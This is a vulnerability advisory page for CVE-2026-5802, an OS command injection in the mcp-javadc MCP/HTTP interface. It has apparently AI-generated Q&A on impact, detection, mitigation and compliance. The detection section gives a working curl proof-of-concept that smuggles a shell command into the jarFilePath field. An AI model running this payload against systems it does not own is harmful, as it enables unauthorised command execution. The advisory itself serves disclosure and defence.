CVE-2026-5802
OS Command Injection in idachev MCP-JavaDC HTTP Interface
Publication date: 2026-04-08
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| idachev | mcp-javadc | to 1.2.4 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5802 is a command injection vulnerability in the idachev mcp-javadc project up to version 1.2.4. It arises from unsafe handling of the jarFilePath argument in the decompile-from-jar tool exposed via the MCP/HTTP interface. The jarFilePath parameter is directly embedded into shell commands without proper sanitization, allowing an attacker to inject arbitrary OS commands.
An attacker with network access to the MCP/HTTP interface can remotely execute arbitrary system commands with the privileges of the server process by crafting malicious requests that break out of the quoted shell command context.
Exploitation has been demonstrated by executing commands like 'id' to reveal user identity information, confirming the ability to run arbitrary commands on the host.
How can this vulnerability impact me? :
This vulnerability can have severe impacts including full host compromise. An attacker can execute arbitrary commands on the affected system, leading to:
- Confidentiality loss: reading sensitive files, secrets, environment variables, and data accessible to the server.
- Integrity loss: modifying files, configurations, or downstream systems.
- Availability disruption: disrupting services, consuming resources, or executing destructive commands.
Because the vulnerability affects the entire host system where the server runs, it can lead to complete system compromise.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to exploit the command injection via the vulnerable HTTP interface, specifically by sending crafted JSON-RPC requests to the `tools/call` endpoint with the method `decompile-from-jar` and a malicious `jarFilePath` parameter.
A proof-of-concept command involves sending a JSON-RPC request that injects shell commands, such as the `id` command, to verify if arbitrary command execution is possible.
Example detection approach using curl to send a malicious payload:
- curl -X POST http://<target-host>/tools/call -H 'Content-Type: application/json' -d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"decompile-from-jar","arguments":{"jarFilePath":"/tmp/a\" ; id >&2 ; \"","className":"com.example.Foo"}}}'
If the response or error output includes user identity information (output of the `id` command), it confirms the presence of the command injection vulnerability.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting or disabling access to the vulnerable MCP/HTTP interface to prevent remote exploitation.
Implement network-level controls such as firewall rules or access control lists to limit access to trusted users only.
If possible, temporarily disable or block the `decompile-from-jar` method or the entire `tools/call` endpoint until a patch or fix is available.
Apply application-level mitigations such as:
- Remove free-form shell command execution from request handlers.
- Replace direct shell execution with a fixed allowlist of commands and strict argument validation.
- Use safer Node.js APIs like `spawn` or `execFile` with argument arrays and without `shell: true`.
- Implement authentication, authorization, audit logging, and rate limiting on sensitive MCP/HTTP endpoints.
Monitor for any suspicious activity or exploitation attempts in logs and network traffic.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows remote attackers to execute arbitrary system commands on the affected host, leading to full host compromise. This includes the ability to read sensitive files, secrets, environment variables, and accessible data, as well as modify files and disrupt services.
Such unauthorized access and control over the system can result in breaches of confidentiality, integrity, and availability of data, which are critical requirements under common standards and regulations like GDPR and HIPAA.
Specifically, the exposure of sensitive personal data or protected health information due to this vulnerability could lead to non-compliance with GDPR's data protection principles and HIPAA's security rules, potentially resulting in legal and financial penalties.
Therefore, until this vulnerability is mitigated, systems using the affected software may be at risk of violating these compliance requirements.